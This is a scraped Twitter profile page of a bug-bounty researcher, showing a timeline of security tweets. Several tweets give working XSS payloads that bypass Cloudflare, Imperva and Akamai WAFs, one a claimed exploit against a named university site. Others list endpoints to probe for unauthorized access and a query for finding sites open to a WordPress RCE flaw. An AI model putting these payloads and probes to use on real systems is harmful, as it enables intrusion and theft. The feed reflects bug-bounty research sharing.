Siva Rajendran (@0xsh1v4) 's Twitter Profile
Security Researcher; OSCP, CRTE; 📍 🇩🇪 ; SRT, Bug-bounty hunter; 🇮🇳

ID: 177138142

Link: https://0xsh1v4.github.io; Date: 11-08-2010 10:12:22

1,1K Tweet

255 Followers

974 Following

Alexander Myasoedov (@arekusandr_) 's Twitter Profile Photo

INTRODUCING: Agentic Security - LLM Security Scanner! 🔍 🔑 Features: Scans for prompt injections, jailbreaking & more. Provides detailed reports & options to customize attack rules. 🔗access the GitHub Link ↓

KNOXSS (@kn0x55) 's Twitter Profile Photo

#XSS #WAF #Bypass ➡️ CloudFlare <Img Src=OnXSS OnError=alert(1)> ➡️ Imperva <Img Src=//X55.is OnLoad%0C=import(Src)// ➡️ Akamai <A AutoFocus HRef %252F=""OnFocus=top/**/?.['al'%2B'ert'](1)> Sign up now! knoxss.me 😎 By Brute Logic

Otterly (@ott3rly) 's Twitter Profile Photo

If you have issues bypassing WAF on POST/PUT/PATCH methods manually, you could try this extension: github.com/assetnote/nowa… Absolute game-changer. Credits to shubs for bringing this in for public. #bugbounty

xss0r (@xss0r) 's Twitter Profile Photo

🚀 #IBRAHIMXSS Tool Giveaway! 🚀 To celebrate the upcoming release of my #IBRAHIMXSS Tool in just 3 days, I’m giving away #FREE access for 3 months to 3 lucky winners! 🎉 ~How to enter: Share this post 💠 Repost Like this post 👍 It’s that simple! The giveaway starts now

Elon Musk (@elonmusk) 's Twitter Profile Photo

Nice work by @xAI team, X team, @Nvidia & supporting companies getting Memphis Supercluster training started at ~4:20am local time. With 100k liquid-cooled H100s on a single RDMA fabric, it’s the most powerful AI training cluster in the world!

Ali (@111xnagashy) 's Twitter Profile Photo

Add to your wordlist : actuator/env actuator/auditevents actuator/beans actuator/caches actuator/configprops actuator/health actuator/heapdump actuator/info actuator/integrationgraph actuator/configprops #bugbountytip #bugbountytips #bugbounty #hackerone #bugcrowd #h1

𐰚𐰼𐰇𐱅 (@ynsmroztas) 's Twitter Profile Photo

If you discover the Docker Registry Domain, be sure to check the /v2/_catalog endpoint, as this domain should be 401, if access is allowed. you can get everything 🥰 so you can disclose sensitive data, rce, all information #bugbountytips #BugBounty github.com/Syzik/DockerRe…

𐰚𐰼𐰇𐱅 (@ynsmroztas) 's Twitter Profile Photo

If you encounter the default IIS Windows window, do not forget to add /haproxy and /netdata to your wordlist and scan them, if you gain unauthorized access here, you will earn a reward 🌹🥰 #bugbountytips #BugBounty

Hunter (@huntermapping) 's Twitter Profile Photo

🚨Alert🚨CVE-2024-5932 (CVSS 10): Critical RCE Vulnerability Impacts 100k+ WordPress Sites! 📊 173K+ Services are found on hunter.how yearly 🔗Hunter Link: hunter.how/list?searchVal… 👇Search Query HUNTER: web.body="/wp-content/plugins/give"

Ali (@111xnagashy) 's Twitter Profile Photo

W.AF AKAM.AI by.pass Lead to 30 XSS in large BBP🤯 "><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto"> Writeup Soon🫡 #bugbountytips #bugbountytip #bugbounty #hackerone #bugcrowd

zhero; (@zhero___) 's Twitter Profile Photo

Ali congratulations for your reports however it is only the newly introduced JS event; most WAFs have not added it yet remember to credit the author: Masato Kinugawa x.com/kinugawamasato…

𐰚𐰼𐰇𐱅 (@ynsmroztas) 's Twitter Profile Photo

always examine the .js files in the source code, for this I can recommend this simple but effective tool github.com/w9w/JSA from here you can access the endpoints of critical data, the places where backup files are stored and many endpoints 🌹🥰🥳 #bugbountytip #bugbounty

Mejbaur Bahar Fagun (@fagun018) 's Twitter Profile Photo

🚨 XSS Alert! 🚨 Just exploited an XSS vulnerability on Harvard 🔥 Watch out for reflected XSS in the search parameter! Here's the PoC: "-->""/>Hack by Fagun</script><deTailS open x=">" ontoggle=(co\u006efirm)``>" #bugbounty #cybersecurity #XSS #mejbaurbaharfagun #bug #bounty

Md Ismail Šojal 🕷️ (@0x0sojalsec) 's Twitter Profile Photo

A solid XSS payload that bypasses Imperva WAF ⚙️ <a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click #infosec #cybersec #bugbountytips

zhero; (@zhero___) 's Twitter Profile Photo

with the security advisory published, I should publish my paper within a few hours Race-Condition to Cache Poisoning - CVE-2025-32421 on Next.js partially leading to the bypass of my previous vulnerability the CVE-2024-46982
